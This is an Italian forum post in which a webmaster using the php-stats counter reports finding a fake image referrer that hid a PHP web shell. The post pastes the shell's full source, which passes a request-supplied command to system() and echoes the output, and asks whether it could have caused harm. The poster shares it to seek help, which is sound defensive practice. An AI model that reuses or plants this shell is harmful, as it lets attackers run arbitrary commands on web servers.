Utilizzo come contatore di statistiche php-stats.
Ho trovato come referrer una finta immagine che nascondeva questo script:
Ho omesso il nome dell'autore dello script, nome conosciuto come hacker.codice:<font face="Comic Sans MS" size="2"><center> CMD - System Command </center></font><font face="Verdana" size="1"></center> # CMD PHP Injection: # Edit Ulang oleh : Lanzhit # DALnet Best Server in The World <hr color="red" width=751px height=115px> <pre><font face="Verdana" size="1"> <? // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt ) if (isset($chdir)) @chdir($chdir); ob_start(); system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output)); ?> </font></pre> <hr color="red" width=751px height=115px> <font face="Verdana" size="1">« !!! NOME HACKER !!! » @ īrē.Šå£.ńėt #Pemangkat
Non vedo danni apparenti. Ci potrebbero essere stati?
Dalle statistiche risulta:
Windows 98 Explorer 5 ? 69.88.24.217
Lingua: Indonesiano
Host: IP-69-88-24-217.HAWAIITELEPORT.COM

Rispondi quotando
